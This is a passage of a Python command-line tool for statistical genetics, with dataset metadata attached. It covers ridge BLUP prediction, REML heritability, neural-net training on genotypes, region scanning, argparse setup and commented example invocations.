args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"]\n del genotypeData ; gc.collect() # dont need this\n \n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # save away the surviving SNP list that we have used \n indicesToRemove = qc_data[\"indicesToRemove\"]\n del qc_data; gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M dont store it 2x\n gc.collect()\n \n # get SNP coefs\n results = reml.computeBLUPs_RidgeBLUP(y, M, args.delta)\n Beta = results.BETA\n del M; del results; gc.collect()\n print(\"computed Ridge Coefs\")\n # load validation sets\n #y_validation = knet_IO.loadPLINKPheno(args.validPhen, caseControl = cc, recodeCaseControl = recodecc) \n \n genotypeData = knet_IO.loadPLINK(args.validSet, loadPhenos = False) \n M_validation = genotypeData[\"M\"] \n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.removeList(M_validation, indicesToRemove)\n M_validation = qc_data[\"X\"] \n del qc_data; gc.collect() \n M_validation = geno_qc.standardise_Genotypes(M_validation) \n gc.collect() \n print(\"After standardising, validation data in MBs is: 
\",geno_qc.getSizeInMBs(M_validation) )\n\n\n\n # make predictions\n yhat = reml.predictYhat(M_validation, Beta)\n # this is a 1D array, not 2D\n \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range( len(yhat) ) :\n line = str(yhat[i] )\n\n \n file.write( line + \"\\n\") # file.write( ( str(yhat[i])[2:-1] ).replace(\" \", \" \").replace(\" \", \"\\t\") + \"\\n\")\n\n## same a sother but it uses the Ridge formula of XXt, IE will use much less memory\ndef runrrblup(args) :\n print(\"runrrblup\", flush=True)\n set_Threads(args)\n set_nixMem(args) \n print('Knet RidgeRegression BLUP started', flush=True) \n \n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"]\n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # save away the surviving SNP list that we have used \n indicesToRemove = qc_data[\"indicesToRemove\"]\n del qc_data; gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M dont store it 2x\n gc.collect()\n \n # get SNP coefs\n g = reml.computeBLUPs_RidgeBLUP_morep(y, M, args.delta)\n Beta = reml.backCalculate_Beta_BLUP(g,M) \n del M; gc.collect()\n print(\"computed Ridge Coefs\", flush=True)\n # load validation sets\n #y_validation = knet_IO.loadPLINKPheno(args.validPhen, caseControl = cc, recodeCaseControl = recodecc) \n \n genotypeData = knet_IO.loadPLINK(args.validSet, loadPhenos = False) \n M_validation = genotypeData[\"M\"] \n del genotypeData ; gc.collect() # dont need this\n qc_data = geno_qc.removeList(M_validation, indicesToRemove)\n M_validation = qc_data[\"X\"] \n del qc_data; gc.collect() \n M_validation= geno_qc.standardise_Genotypes(M_validation) \n gc.collect() \n print(\"After standardising, validation data in MBs is: \",geno_qc.getSizeInMBs(M_validation) , flush=True)\n\n #fileName = args.out + \"beta.txt\"\n #with open(fileName, \"w\") as file:\n # file.write(\"Beta\" + \"\\n\")\n # for i in range( len(Beta) ) :\n # line = str(Beta[i] ) \n # file.write( line + \"\\n\") \n\n\n indicesToRemove = list()\n for i in range( M_validation.shape[1] ) :\n if np.isnan(M_validation[:,i]).any() :\n print(\"!!!Validation set has NaNs at column:\" + str(i), flush=True)\n indicesToRemove.append(i) \n \n # need to remove any NaNs from both the genotype matrix and its corresponding Beta\n print(\"num SNPs BEFORE removing: \", Beta.shape[0] )\n M_validation = np.delete(M_validation, indicesToRemove, axis=1)\n Beta = np.delete(Beta, indicesToRemove, axis=0)\n print(\"num SNPs AFTER removing: \", Beta.shape[0] )\n \n \n \n # make predictions\n yhat = reml.predictYhat(M_validation, Beta)\n\n # this is a 1D array, not 2D\n \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range( len(yhat) ) :\n line = str(yhat[i] ) \n file.write( line + \"\\n\") \n \n \ndef runh2(args) :\n set_Threads(args)\n 
set_nixMem(args) \n print('Knet H2 analysis started') \n if args.eig is None and args.bfile is None and args.K is None:\n print(\"either an eigen decomposition or a PLINK binary or a Kinship matrix is required\")\n\n else :\n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n y = geno_qc.standardise_Genotypes(y)\n \n if args.eig is None and args.K is None : # if an eigen summary wasn't supplied, IE we don't have it\n print(\"calculating REML from scratch, no Eigen summary was supplied\")\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n\n qc_data = geno_qc.genoQC_all(M, rsIds = genotypeData[\"rsid\"])\n M = qc_data[\"X\"]\n gc.collect()\n M = geno_qc.standardise_Genotypes(M) # overwrite M, don't store it twice\n gc.collect()\n K = kinship.calc_Kinship( M ) # 3. create kinship matrix from block \n del M ; gc.collect() # delete M as we no longer need it \n results = reml.REML_GWAS(y, K) # 4. check if there is any h2 in this block via EMMA\n del K ; gc.collect()\n \n elif args.K : # if a kinship matrix was supplied\n print(\"calculating REML from the supplied Kinship matrix\")\n K_new = knet_IO.loadGCTA_GRM(args.K)\n K = K_new[\"K\"] \n del K_new; gc.collect()\n \n results = reml.REML_GWAS(y, K) # 4. check if there is any h2 in this block via EMMA\n \n else :\n print(\"loading saved eigen sums from: \" + args.eig)\n loadedEigSum = knet_IO.loadEigenSum(args.eig)[0] # load eigen decomposition\n results = reml.REML_GWAS(y, eigenSummary = loadedEigSum) # 4. 
check if there is any h2 in this block via EMMA\n\n\n \n eigSum = results[\"eigSum\"] # just resave the one we have got \n h2 = results[\"vg\"] / ( results[\"vg\"] + results[\"ve\"])\n h2_SE = reml.h2_SE_approx2(y, eigSum.values)\n\n print(\"h2: \" , h2 , \" / h2 SE: \", h2_SE, \" / delta: \", results[\"delta\"])\n fileName = args.out + \"reml.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"h2=\" + str(h2) + \"\\n\")\n file.write(\"h2_SE=\" + str(h2_SE) + \"\\n\")\n file.write(\"delta=\" + str(results[\"delta\"]) + \"\\n\")\n file.write(\"ve=\" + str(results[\"ve\"]) + \"\\n\")\n file.write(\"vg=\" + str(results[\"vg\"]) + \"\\n\")\n file.write(\"REML_LL=\" + str(results[\"REML\"]) + \"\\n\")\n \n # now write out the eigen summaries too ( but only if it wasn't supplied in the first place)\n if args.eig is None : knet_IO.writeEigenSum(args.out, [eigSum ] ) # the below function expects a list\n\n\ndef runKnet(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet Neural net started')\n\n # load regions\n regions = None\n amblup_regions = None # this has a different structure\n if args.regions :\n regions = knet_IO.loadRegionData(args.regions) # load regions#\n \n elif args.amblupregions and args.amblupreml :\n print('loading AMBLUP regions')\n\n remlData = knet_IO.loadLDAKRegionsDeltas(args.amblupreml)\n regionData = knet_IO.loadLDAKRegions(args.amblupregions)\n amblup_regions = {\"REGIONS\":regionData, \"DELTAS\":remlData, \"CONV\":args.conv }\n\n priors = None\n if args.priors :\n priors = knet_IO.loadSummaryStats(args.priors) # load 'priors'\n \n\n \n # check if we need to load saved state weights\n loadedWeightsData = None\n \n if args.loadWeights :\n\n loadedWeightsData = list()\n moreFiles = True\n counter = 0\n \n while moreFiles : # keep going until we run out of files to load\n # currentLocation = args.loadWeights + str(counter) # files are expected to be named as regions1.txt, regions2.txt, etc\n my_file = Path(args.loadWeights + \"_\"+ str(counter) +\"_0.bin\") # check if the main weights file exists\n \n if my_file.is_file(): # check if it exists\n loadedWeightsData.append(list())\n \n for j in range(4) : # there are 4 files, 1 for each of W, W bias, Momentum and Momentum bias\n loadedWeightsData[counter].append( knet_IO.loadMatrixFromDisk(args.loadWeights + \"_\"+ str(counter) + \"_\" + str(j)) )\n # each weight is a matrix ( even the biases), and they are coded as name_LAYER_W/Bias/Momentum/Momentum_bias (so chrom_0_0 is layer 1's Weights_W)\n counter = counter + 1\n else : moreFiles = False\n \n \n \n # pass this into knet manager, along with all the conditional params\n knet_results = knet_manager.runKnet(args, args.epochs, args.learnRate, args.momentum, regions, args.evalFreq, args.savFreq, args.predictPheno, loadedWeightsData, args.saveWeights, args.randomSeed, args.hidCount, args.hidl2, args.hidAct, amblup_regions, priors)\n gc.collect() \n\n\n \n # write epoch results out\n results_its = knet_results[\"results\"][\"results\"] \n fileName = args.out + \"nn_results.txt\"\n with open(fileName, \"w\") as file: \n \n line = \"epochs\"\n if \"train_accuracy\" in results_its: line = line + \"\\t\" + \"train_accuracy\"\n if \"test_accuracy\" in results_its: line = line + \"\\t\" + \"test_accuracy\"\n file.write(line + \"\\n\")\n \n for i in range( len(results_its[\"epochs\"]) ):\n line = str(results_its[\"epochs\"][i]) \n if \"train_accuracy\" in results_its: line = line + \"\\t\" + str(results_its[\"train_accuracy\"][i])\n if \"test_accuracy\" in results_its: line 
= line + \"\\t\" + str(results_its[\"test_accuracy\"][i])\n file.write(line + \"\\n\") \n \n \n # generate plot of the results\n if len(results_its[\"epochs\"]) > 0 :\n plotgen.exportNNPlot(results_its, args.out + \"nnplot\")\n \n \n # write out the SNPs that were used for the analysis\n rsIds = knet_results[\"rsIds\"]\n fileName = args.out + \"nn_SNPs.txt\"\n with open(fileName, \"w\") as file: \n for i in range( len(rsIds) ):\n file.write(rsIds[i] + \"\\n\")\n \n\n\n # write final predictions out ( if this was requested)\n yhat = knet_results[\"yhat\"]\n \n # recode yhat into single col: I think this is a bad idea as this will basically threshold everyone to be all 1s\n outputShape = 1\n if len(yhat.shape) > 1 : outputShape = yhat.shape[1]\n # if outputShape > 1 : yhat = knet_IO.recodeOneHotCaseControl(yhat)\n \n if yhat is not None : \n fileName = args.out + \"yhat.txt\"\n with open(fileName, \"w\") as file:\n file.write(\"Profile\" + \"\\n\")\n for i in range(yhat.shape[0]) :\n line = str(yhat[i][0] )\n for j in range(1, len(yhat[i]) ):\n line = line + \"\\t\" + str(yhat[i][j] )\n \n file.write( line + \"\\n\") # file.write( ( str(yhat[i])[2:-1] ).replace(\" \", \" \").replace(\" \", \"\\t\") + \"\\n\")\n\n \n \n \n \n \n # write final weights out\n # results[\"weights\"]\n weights_nn = None\n if knet_results[\"weights\"] is not None:\n weights_nn = knet_results[\"weights\"]\n for i in range(len(weights_nn)) :\n for j in range(len(weights_nn[i])) :\n knet_IO.writeMatrixToDisk( args.saveWeights + \"_\" + str(i)+ \"_\" + str(j) , weights_nn[i][j])\n # each weight is a matrix ( even the biases), and they are coded as name_LAYER_W/Bias/Momentum/Momentum_bias (so chrom_0_0 is layer 1's Weights_W)\n \n \n\n \ndef runScanner(args) : \n set_nixMem(args) \n set_Threads(args)\n print(\"Knet scanner started\")\n\n # check if we want to load the eigen decomposition summaries for each region or not\n # loadedEigSum = None\n # if args.loadEigSum is not None :\n # print(\"loading saved eigen sums from: \" + args.loadEigSum)\n # loadedEigSum = knet_IO.loadEigenSum(args.loadEigSum)\n \n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False\n\n # load plink binary / phenotypes\n genotypeData = knet_IO.loadPLINK(args.scanner, loadPhenos = False) \n M = genotypeData[\"M\"]\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n \n # obtain regions\n regionResults = scanner.findRegions(y, M, irsIds = genotypeData[\"rsid\"], blockSize = args.filterSize, stride = args.stride, X = None)\n\n # check if we want to save the eigen decomposition summaries for each region or not\n # if args.saveEigSum is not None:\n # print(\"saving eigen decompositions to: \" + args.saveEigSum)\n # knet_IO.writeEigenSum(args.saveEigSum, regionResults[\"eigSum\"] )\n \n # write regions onto disk\n knet_IO.writeRegionData(args.out,regionResults[\"REGIONS\"], regionResults[\"DELTAS\"])\n print(\"written regions to: \" + args.out)\n \n \n # write out the SNPs that were used for the analysis\n rsIds = regionResults[\"rsIds\"]\n fileName = args.out + \"_SNPs.txt\"\n with open(fileName, \"w\") as file: \n for i in range( len(rsIds) ):\n file.write(rsIds[i] + \"\\n\")\n \n\n \n \ndef runMerge(args) : \n set_nixMem(args) \n set_Threads(args)\n print('Knet merging started, from: ' + args.merge + \" to: \" + args.out)\n # check for other required arguments\n\n location = args.merge\n outLocation = args.out\n \n moreFiles = True\n counter = 1\n allRegions = 
list()\n while moreFiles : # keep going until we run out of files to load\n currentLocation = location + str(counter) + \".txt\" # files are expected to be named as regions1.txt, regions2.txt, etc\n my_file = Path(currentLocation)\n\n if my_file.is_file(): # check if it exists\n allRegions.append( knet_IO.loadRegionData(currentLocation) ) # load regions\n else : moreFiles = False\n counter = counter + 1\n \n # concat them into a single list\n results = scanner.concatRegions(allRegions)\n \n # write these onto disk\n knet_IO.writeRegionData(outLocation,results[\"REGIONS\"], results[\"DELTAS\"] )\n\n\n##################################################################################################\n# set up the command line parser\n##################################################################################################\n\nparser = argparse.ArgumentParser()\n\n\n\n# overall\nparser.add_argument(\"--out\",required=True, help='an output location is always required')\nparser.add_argument(\"--threads\",required=False, help='set number of threads used by multithreaded operations')\nparser.add_argument(\"--nixMem\",required=False, type=int, help='Memory limit for *nix based systems in Megabytes')\n\n\nsubparsers = parser.add_subparsers()\nsubparsers.required = True\nsubparsers.dest = 'either knet, scanner, h2, kinship, kinmerge or merge' # hack to make subparser required\n\n# create the parser for the \"knet\" command\nparser_knet = subparsers.add_parser('knet')\nparser_knet.add_argument('--knet', required=True) # the location of the train set binaries\nparser_knet.add_argument(\"--pheno\", required=True)\nparser_knet.set_defaults(func=runKnet)\n\n# knet subparams\nparser_knet.add_argument(\"--regions\", required=False) # ,required=False \nparser_knet.add_argument(\"--loadWeights\") # from where we want to load the weights\nparser_knet.add_argument(\"--saveWeights\") # where we want to save weights\nparser_knet.add_argument(\"--savFreq\", default=-1, type=int) # how frequently we make backups of Weights\nparser_knet.add_argument(\"--epochs\", default=100, type=int) # how many epochs\nparser_knet.add_argument(\"--learnRate\", default=0.005, type=float) \nparser_knet.add_argument(\"--momentum\", default=-1, type=float) # -1 means 'disabled'\nparser_knet.add_argument(\"--validSet\") # the location for the binaries for the validation set\nparser_knet.add_argument(\"--validPhen\") # the location for the binaries for the validation set phenotypes\nparser_knet.add_argument(\"--evalFreq\", default=10, type=int) # how frequently we evaluate prediction accuracy (-1 for disabled) \nparser_knet.add_argument(\"--cc\", type=int) # ,required=False # if phenotype is case control\nparser_knet.add_argument(\"--recodecc\", type=int) # ,required=False # if we want to recode case control to quantitative\nparser_knet.add_argument(\"--randomSeed\", default=1, type=int) \nparser_knet.add_argument(\"--hidCount\", default=0, type=int) # number of hidden layers\nparser_knet.add_argument(\"--hidl2\", default=0.0, type=float) # the L2 regularizer shrinkage param \nparser_knet.add_argument(\"--hidAct\", default=0, type=int) # the hidden layer activations ( 0 = softplus, 1 = sigmoid, 2 = leaky RELU, 3 = linear)\nparser_knet.add_argument(\"--amblupregions\") # amblup regions directory, this contains the number of regions and the SNPs in each region\nparser_knet.add_argument(\"--amblupreml\") # amblup reml file location, this contains the regional heritabilities \nparser_knet.add_argument(\"--conv\", default=0, type=int) # if we 
should use locally connected / convolutional topology when using amblup\nparser_knet.add_argument(\"--priors\") # from where we want to load the SNP 'priors'\n \n# parser_knet.add_argument(\"--topology\", required=True) # the location of the file that describes the network's topology (IE number and size of layers etc)\nparser_knet.add_argument(\"--predictPheno\", default=-1, type=int) # if network should save phenotype predictions to a location at the end, for a validation set \n \n \nparser_scanner = subparsers.add_parser('scanner')\nparser_scanner.add_argument('--scanner', required=True)\nparser_scanner.add_argument(\"--pheno\", required=True)\nparser_scanner.set_defaults(func=runScanner)\n\nparser_merge = subparsers.add_parser('merge')\nparser_merge.add_argument('--merge', required=True)\nparser_merge.set_defaults(func=runMerge)\n\n# narrow sense h2 analysis\nparser_h2 = subparsers.add_parser('h2')\nparser_h2.add_argument('--eig') # the location of the eigen decomposition\nparser_h2.add_argument('--bfile') # the location of the plink binaries \nparser_h2.add_argument('--K') # the location of the Kinship matrix \nparser_h2.add_argument(\"--pheno\", required=True)\nparser_h2.add_argument(\"--cc\", type=int) # ,required=False\nparser_h2.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_h2.set_defaults(func=runh2)\n \n\n# Ridge-BLUP\nparser_rrblup = subparsers.add_parser('rrblup')\nparser_rrblup.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_rrblup.add_argument(\"--delta\", required=True, type=float)\nparser_rrblup.add_argument(\"--pheno\", required=True)\nparser_rrblup.add_argument(\"--cc\", type=int) # ,required=False\nparser_rrblup.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_rrblup.set_defaults(func=runrrblup)\nparser_rrblup.add_argument(\"--validSet\", required=True) # the location for the binaries for the validation set\n#parser_rrblup.add_argument(\"--validPhen\", required=True) # the location for the binaries for the validation set phenotypes\n\n \n# Kinship\nparser_kin = subparsers.add_parser('kinship')\nparser_kin.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_kin.add_argument(\"--dominance\") # if we should compute dominance instead of the usual additive kinship\nparser_kin.add_argument('--weights') # weights used to scale the SNPs ( usually from LDAK)\nparser_kin.add_argument('--MAFS', type=float) # alpha: if Score based on MAF should be used (MAF(1-MAF))^(1-alpha) as per Speed et al\nparser_kin.set_defaults(func=runcalckins)\n \n# Kinship merging\nparser_kinmerge = subparsers.add_parser('kinmerge')\nparser_kinmerge.add_argument('--allkins', required=True) # a text file that contains a list of kinship matrices to be merged, 1 per line without header (GCTA format)\nparser_kinmerge.set_defaults(func=runkinmerge)\n \n \n \n# Multi-HE\nparser_mhe = subparsers.add_parser('mhe')\nparser_mhe.add_argument('--addkin', required=True) # location of the additive kinship matrix\nparser_mhe.add_argument('--domkin') # location of the dominance kinship matrix\nparser_mhe.add_argument(\"--epi\", default=-1, type=int) # the level of epistasis (disabled if < 2)\nparser_mhe.add_argument(\"--pheno\", required=True)\nparser_mhe.add_argument(\"--cc\", type=int) # ,required=False\nparser_mhe.add_argument(\"--recodecc\", type=int) # ,required=False \nparser_mhe.add_argument(\"--res\", default=0, type=int) # if the MHER is running on the original (0) or Residualised version 
(1)\nparser_mhe.set_defaults(func=runmhe)\n \n \n# recoding the PLINK binary into dominance contrasts \nparser_redom = subparsers.add_parser('redom')\nparser_redom.add_argument('--bfile', required=True) # the location of the plink binaries \nparser_redom.set_defaults(func=rundom)\n \n \n \n \n\n# scanner subparams\nparser_scanner.add_argument(\"--stride\", default=25, type=int) # ,required=False\nparser_scanner.add_argument(\"--filterSize\", default=50, type=int) # ,required=False\nparser_scanner.add_argument(\"--saveEigSum\") # ,required=False\nparser_scanner.add_argument(\"--loadEigSum\") # ,required=False\nparser_scanner.add_argument(\"--cc\", type=int) # ,required=False\nparser_scanner.add_argument(\"--recodecc\", type=int) # ,required=False \n \n# retrieve command line arguments\nargs = parser.parse_args()\nargs.func(args)\n\n# toy test\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig\n\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/f1/22eig_\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/21 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/21 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/21.pheno\n\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/15 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15.pheno\n\n#python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/1 --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/1 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/1.pheno\n\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/15_s100_ --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15 --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/15.pheno\n\n\n# python knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 8 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --loadEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig\n\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100d_ --threads 2 scanner --scanner /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22 
--filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100t_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/test/pytest/f1/22_toy_long --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno\n\n\n##################################################################################################\n##################################################################################################\n# Local Tests\n\n# SCANNER\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/regions22_','scanner', '--scanner','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--stride', '50', '--filterSize', '100']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n#args.func(args)\n\n# KNET MAIN\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n# Knet main as case control one hot \nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n \n \n \n # load / save weights \nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' , '--loadWeights', '../../../0cluster/results/knettest/chr22']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n \n \n# h2 analysis:\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/h2/chr1','h2', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n# same as above but loading eigsum\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/h2/chr1','h2', '--eig','../../../0cluster/results/knettest/h2/chr1', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', 
'../../../0cluster/data/data/toy/eig/'\n \n \n# Ridge BLUP\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/bluptest','rrblup', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid', '--delta', '20.0'])\n \n \n#Kinship\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/kinship','kinship', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--weights', '../../../0cluster/data/knettest/weights.short', '--MAFS', '-0.25', '--dominance' , '1']) \n \n \n \n#Kinship merge\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/kinship_merged','kinmerge', '--allkins','../../../0cluster/results/broadsenseh2/kinlist.txt']) \n \n\n# Multi HE\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/heh2','mhe', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--addkin','../../../0cluster/results/broadsenseh2/kinship_add', '--domkin','../../../0cluster/results/broadsenseh2/kinship_dom', '--epi','2', '--res', '1']) \n \n\n# GCTA kinship\nargs = parser.parse_args(['--out', '../../../0cluster/results/gcta/knetver','h2', '--bfile','../../../0cluster/results/gcta/wtccc2_hg19_toy', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n\n# recode to Dominance\nargs = parser.parse_args(['--out', '../../../0cluster/results/gcta/knetdom','redom', '--bfile','../../../0cluster/results/gcta/wtccc2_hg19_toy']) \n\n \n\n# Knet AMBLUP regions\nargs = parser.parse_args(['--out', '../../../0cluster/results/knet_amblup/kamblup','knet', '--knet','../../../0cluster/data/data/toy/wtccc2_hg19_toy', '--pheno', '../../../0cluster/data/data/toy/wtccc2_hg19_toy.pheno', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/data/toy/wtccc2_hg19_toy' ,'--validPhen', '../../../0cluster/data/data/toy/wtccc2_hg19_toy.pheno', '--evalFreq', '10', '--recodecc' , '1' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' , '--amblupreml' , '../../../0cluster/data/data/toy/amblup_1.reml' , '--amblupregions' , '../../../0cluster/data/data/toy/chunks_amb1/' , '--conv' , '0' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n\n \n# \n# --saveWeights\n# --savFreq\n\n\n \n \n \n \n", "sub_path": "knet/knet.py", "file_name": "knet.py", "file_ext": "py", "file_size_in_byte": 42688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "resource.RLIMIT_AS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "resource.getrlimit", "line_number": 60, "usage_type": "call"}, {"api_name": "resource.setrlimit", "line_number": 64, "usage_type": "call"}, {"api_name": "resource.getrlimit", "line_number": 66, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 79, 